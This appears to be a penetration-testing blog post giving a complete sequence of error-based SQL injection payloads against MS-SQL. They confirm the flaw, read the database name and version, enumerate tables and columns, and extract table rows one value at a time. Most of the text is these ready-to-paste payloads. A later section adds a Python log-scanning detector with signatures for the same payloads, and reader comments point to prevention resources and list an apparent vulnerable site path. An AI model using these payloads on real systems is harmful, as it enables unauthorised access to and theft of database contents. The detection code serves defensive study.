MS-SQL data dumping queries for manual penetration testing [SQL injection].
In this article I'll describe how to gain access to the back-end MS-SQL server and dump all of the database contents through the well-known SQL Injection flaw. I have given all the required SQL queries in separate steps. Before executing the queries, make sure the target web application is vulnerable to SQL Injection.
Note: I have tested the queries on MS-SQL 2005/2008 Server.
Confirming the SQL Injection [SQL Query]
Step 1
> aaa' OR
Step 2
> aaa' and (select count(*) from sometable)=1 or '1'='0
Retrieve Database Name [SQL Query]
Step 3
> aaa' AND (select cast(CHAR(127)+db_name(dbid)+CHAR(127) as int) from master..sysprocesses where spid=@@SPID) = 1 OR '2'='1
Find MS SQL Version [SQL Query]
Step 4
> aaa' AND (select cast(CHAR(127)+@@Version+CHAR(127) as int)) = 1 OR '2'='0
No. of user tables [SQL Query]
Step 5
> aaa' AND (select cast(CHAR(127)+cast(count(name) as varchar)+CHAR(127) as int) from Sysobjects where xtype in('u','v')) = 0 OR '2'='0
Enumerating the table names [get the number of user tables from step 5] [SQL Query]
Step 6
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 1 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 2 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 3 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 4 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 5 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 6 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 7 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 8 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 9 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 10 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 11 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 12 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
No. of attributes/columns in a table [get the table names from step 6] [SQL Query]
Step 7
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-1'))Tablename) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-2'))Tablename) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-3'))Tablename) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-4'))Tablename) = 1 OR '2'='0
Enumerating the attribute names of a table [get the number of attributes from step 7] [SQL Query]
Step 8
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 1 name from syscolumns where id = (select id from sysobjects where name='Table-1') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 2 name from syscolumns where id = (select id from sysobjects where name='Table-1') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 3 name from syscolumns where id = (select id from sysobjects where name='Table-1') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 1 name from syscolumns where id = (select id from sysobjects where name='Table-2') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0
No. of records/rows in a table [SQL Query]
Step 9
> aaa' AND (select cast(CHAR(127)+cast(count(*) as varchar)+CHAR(127) as int) from Table-1) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+cast(count(*) as varchar)+CHAR(127) as int) from Table-2) = 1 OR '2'='0
Extracting Data from a Table [SQL Query]
Step 10
1st > aaa' AND (select cast(CHAR(127)+rtrim(ISNULL(cast(Column-1 as varchar),'null'))+CHAR(127) as int) from (select top 1 * from Table-1 order by 1 desc) dtable) = 1 OR '2'='0
2nd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Column-1 as varchar),'null') from (select top 1 * from (select TOP 2 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
3rd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Column-1 as varchar),'null') from (select top 1 * from (select TOP 3 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
4th > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Column-1 as varchar),'null') from (select top 1 * from (select TOP 4 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
1st > aaa' AND (select cast(CHAR(127)+rtrim(ISNULL(cast(Column-2 as varchar),'null'))+CHAR(127) as int) from (select top 1 * from Table-1 order by 1 desc) dtable) = 1 OR '2'='0
2nd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Column-2 as varchar),'null') from (select top 1 * from (select TOP 2 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
3rd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Column-2 as varchar),'null') from (select top 1 * from (select TOP 3 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
4th > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Column-2 as varchar),'null') from (select top 1 * from (select TOP 4 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
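Seen from the defender's side, the queries in steps 3 to 10 share a recognisable shape: a value wrapped in CHAR(127) is cast to int so that the server's conversion error echoes it, the catalog probes walk sysobjects/syscolumns with nested TOP N ... ORDER BY 1 subqueries, and every payload ends in an OR 'n'='m' tail. The following is an added example of mine, not code from the original article: it flags those shapes in web-server access log lines and checks whether a verbose SQL Server conversion error carrying a CHAR(127)-delimited value reached the client. The log lines, paths and IP addresses are constructed, and the error text assumes the standard wording of SQL Server message 245.

```python
import re
from urllib.parse import unquote, unquote_plus

# Signatures derived from the payload shapes in steps 1-10 above; input is lowercased first.
SIGNATURES = {
    "error_based_cast": re.compile(r"cast\s*\(\s*char\s*\(\s*127\s*\)\s*\+"),
    "catalog_enum": re.compile(r"\bfrom\s+(sysobjects|syscolumns|master\.\.sysprocesses)\b"),
    "version_probe": re.compile(r"@@version"),
    "tautology_tail": re.compile(r"\bor\s+'\d+'\s*=\s*'\d+"),
    "nested_top": re.compile(r"\btop\s+\d+\b.*\border\s+by\s+1\s+(desc|asc)\b"),
}
# Request field of a combined-format access log, e.g. "GET /item.php?id=42 HTTP/1.1"
REQUEST_RX = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
# SQL Server conversion-error text carrying a CHAR(127)-delimited value between the quotes
LEAK_RX = re.compile(r"conversion failed when converting the \w+ value '\x7f[^\x7f]*\x7f'")

def classify(query_string):
    """Names of every signature matching the URL-decoded query string (empty if benign)."""
    # unquote_plus first (form encoding), then unquote again to catch double encoding
    text = re.sub(r"\s+", " ", unquote(unquote_plus(query_string))).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_access_log(lines):
    """Return (path, matched signatures) for each request whose query string is suspicious."""
    hits = []
    for line in lines:
        m = REQUEST_RX.search(line)
        if not m:
            continue  # not a request line in the expected format; skip rather than guess
        path, _, query = m.group("path").partition("?")
        tags = classify(query)
        if tags:
            hits.append((path, tags))
    return hits

def response_leaks_value(body):
    """True when a verbose conversion error with a DEL-delimited value reached the client."""
    return LEAK_RX.search(body.lower()) is not None

# Constructed sample log lines (not real traffic): benign lookup, step 4 version probe,
# step 6 first-table probe, and a benign search that merely contains the word "top".
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=aaa%27+AND+%28select+cast%28CHAR%28127%29'
    '%2B%40%40Version%2BCHAR%28127%29+as+int%29%29+%3D+1+OR+%272%27%3D%270 HTTP/1.1" 500 233',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=aaa%27+AND+%28select+cast%28CHAR%28127%29'
    '%2Bname%2BCHAR%28127%29+as+int%29+from%28select+TOP+1+lower%28name%29+as+name+from+%28select+TOP+1+name'
    '+from+sysobjects+where+xtype+in%28%27u%27%2C%27v%27%29+order+by+1+DESC%29+TABLENAMES+order+by+1+ASC%29TableNames2%29'
    '+%3D+1+OR+%272%27%3D%270 HTTP/1.1" 500 240',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=top+10+desks HTTP/1.1" 200 1024',
]
```

A hit on `error_based_cast` together with a 500 status is the strongest indicator; pairing it with `response_leaks_value()` on the captured response body tells you whether the verbose error actually disclosed data.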
Simple query:
Select o.name as 'Table', c.name as 'Field' From dbo.sysobjects o, dbo.syscolumns c Where o.id = c.id and o.xtype = 'U' Order by o.name, c.colid
Good informative post! Also do a post to shed some light on how to prevent this kind of injection!!
Yes Sir ... https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
/shop2/ent2/a03amnb986pk2/password_forgotten.php
if(!is_numeric($_GET['id']) || strlen($_GET['id']) > 10) die("Blocked");